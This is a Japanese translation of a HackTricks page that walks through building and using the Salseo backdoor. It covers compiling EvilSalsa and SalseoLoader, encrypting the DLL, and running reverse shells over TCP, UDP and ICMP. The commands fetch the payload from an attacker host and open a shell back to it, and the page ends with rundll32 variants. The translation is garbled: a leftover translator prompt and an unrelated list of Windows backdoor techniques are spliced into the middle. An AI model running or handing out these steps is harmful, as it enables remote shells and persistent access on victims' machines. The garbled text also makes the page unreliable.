hacktricks/backdoors/salseo.md

13 KiB
Raw Blame History

サルセオ

AWSハッキングをゼロからヒーローまで学ぶ htARTE (HackTricks AWSレッドチームエキスパート)

HackTricksをサポートする他の方法:

バイナリのコンパイル

githubからソースコードをダウンロードし、EvilSalsaSalseoLoaderをコンパイルします。コードをコンパイルするにはVisual Studioがインストールされている必要があります。

これらのプロジェクトを、使用するWindowsボックスのアーキテクチャに合わせてコンパイルしますWindowsがx64をサポートしている場合は、そのアーキテクチャ用にコンパイルします

Visual Studioの左側の**"Build"タブ"Platform Target"**を選択して、アーキテクチャを選択できます。

**このオプションが見つからない場合は、"Project Tab"を押してから"<Project Name> Properties"**を押してください)

次に、両方のプロジェクトをビルドしますBuild -> Build Solutionログ内に実行可能ファイルのパスが表示されます

バックドアの準備

まず、EvilSalsa.dllをエンコードする必要があります。これを行うには、pythonスクリプトencrypterassembly.pyを使用するか、プロジェクトEncrypterAssemblyをコンパイルすることができます:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

(Translation not required for the title)

Windowsには、さまざまなバックドアが存在します。これらは、リモートアクセスを取得したり、将来のアクセスを確保したりするために使用されます。以下に、いくつかの一般的なテクニックを紹介します。

Sticky Keys Exploit

Sticky Keysは、Windowsのアクセシビリティ機能です。この機能を悪用して、ログイン画面でコマンドプロンプトを開くことができます。これにより、システムにアクセスし、さまざまなコマンドを実行することが可能になります。

Utilman Exploit

Utilmanは、Windowsのアクセシビリティ機能の一つです。この機能を悪用すると、ログイン画面でコマンドプロンプトを開くことができます。Sticky Keys Exploitと同様に、システムにアクセスし、コマンドを実行することができます。

RDP Backdoor

RDPRemote Desktop Protocolは、リモートデスクトップ接続を提供するWindowsの機能です。RDPバックドアを設定することで、攻撃者はリモートからシステムにアクセスできます。

Service Backdoor

Windowsサービスを悪用してバックドアを作成することができます。サービスは、システム起動時に自動的に実行されるため、攻撃者はシステムに永続的なアクセスを持つことができます。

Registry Backdoor

レジストリは、Windowsの設定とオプションを格納するデータベースです。レジストリを変更してバックドアを作成することができます。これにより、攻撃者はシステムの設定を変更したり、プログラムを自動的に実行したりすることができます。

Scheduled Tasks

スケジュールされたタスクを使用して、特定の時間にプログラムやスクリプトを自動的に実行することができます。これを悪用することで、攻撃者は定期的にシステムにアクセスすることができます。

PowerShell Backdoor

PowerShellは、Windowsの強力なスクリプティングツールです。PowerShellスクリプトを使用してバックドアを作成することができます。これにより、攻撃者はシステム上で複雑な操作を自動化することができます。

これらのテクニックは、pentestingやセキュリティリサーチにおいて重要です。しかし、不正な目的で使用することは違法であり、倫理的にも許されません。常に合法的な範囲内で活動し、許可を得たテストのみを行うようにしてください。

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

バックドアの実行

TCPリバースシェルの取得HTTPを通じてエンコードされたdllをダウンロードする

ncをリバースシェルリスナーとして、そしてエンコードされたevilsalsaを提供するHTTPサーバーとして起動することを忘れないでください。

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

UDPリバースシェルの取得SMB経由でエンコードされたdllのダウンロード

リバースシェルリスナーとしてncを開始し、エンコードされたevilsalsaを提供するためのSMBサーバーimpacket-smbserverを起動することを忘れないでください。

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

ICMPリバースシェルの取得エンコードされたdllはすでに被害者の内部にあります

この時、リバースシェルを受信するためにクライアントに特別なツールが必要です。ダウンロード: https://github.com/inquisb/icmpsh

ICMP応答の無効化

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

クライアントを実行する:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

被害者の内部で、salseoを実行しましょう

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

SalseoLoaderをDLLとしてコンパイルし、main関数をエクスポートする

Visual Studioを使用してSalseoLoaderプロジェクトを開きます。

main関数の前に追加: [DllExport]

このプロジェクトにDllExportをインストールする

ツール --> NuGetパッケージマネージャー --> ソリューションのNuGetパッケージを管理...

DllExportパッケージを検索Browseタブを使用、インストールを押すポップアップを受け入れる

プロジェクトフォルダには、DllExport.batDllExport_Configure.bat が表示されます。

DllExportをアンインストールする

アンインストールを押します(変ですが、信じてください、これが必要です)

Visual Studioを終了し、DllExport_configureを実行する

Visual Studioを終了します。

次に、SalseoLoaderフォルダに移動し、DllExport_Configure.bat実行します。

x64を選択しますx64ボックス内で使用する場合、それが私の場合でしたSystem.Runtime.InteropServicesを選択します(DllExportのためのNamespace内で)そして適用を押します。

プロジェクトを再びVisual Studioで開く

**[DllExport]**はもはやエラーとしてマークされるべきではありません。

ソリューションをビルドする

出力タイプ = クラスライブラリを選択します(プロジェクト --> SalseoLoaderプロパティ --> アプリケーション --> 出力タイプ = クラスライブラリ)

x64プラットフォームを選択します(プロジェクト --> SalseoLoaderプロパティ --> ビルド --> プラットフォームターゲット = x64

ソリューションをビルドするには:ビルド --> ソリューションのビルド出力コンソール内に新しいDLLのパスが表示されます

生成されたDllをテストする

Dllをテストしたい場所にコピーして貼り付けます。

実行:

rundll32.exe SalseoLoader.dll,main

以下は、ハッキング技術についてのハッキングの本の内容です。ファイル backdoors/salseo.md からの関連する英語のテキストを日本語に翻訳し、まったく同じマークダウンとhtmlの構文を保ったまま翻訳を返してください。コード、ハッキング技術名、ハッキング用語、クラウド/SaaSプラットフォーム名Workspace、aws、gcpなど、'leak'という単語、ペネトレーションテスト、およびマークダウンタグなどの翻訳は行わないでください。また、翻訳とマークダウン構文以外の余分なものは何も追加しないでください。

エラーが表示されなければ、機能するDLLを持っている可能性が高いです

DLLを使用してシェルを取得する

HTTP サーバーを使用し、nc リスナーを設定することを忘れないでください

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
AWSハッキングをゼロからヒーローまで学ぶ htARTE (HackTricks AWS Red Team Expert)

HackTricksをサポートする他の方法: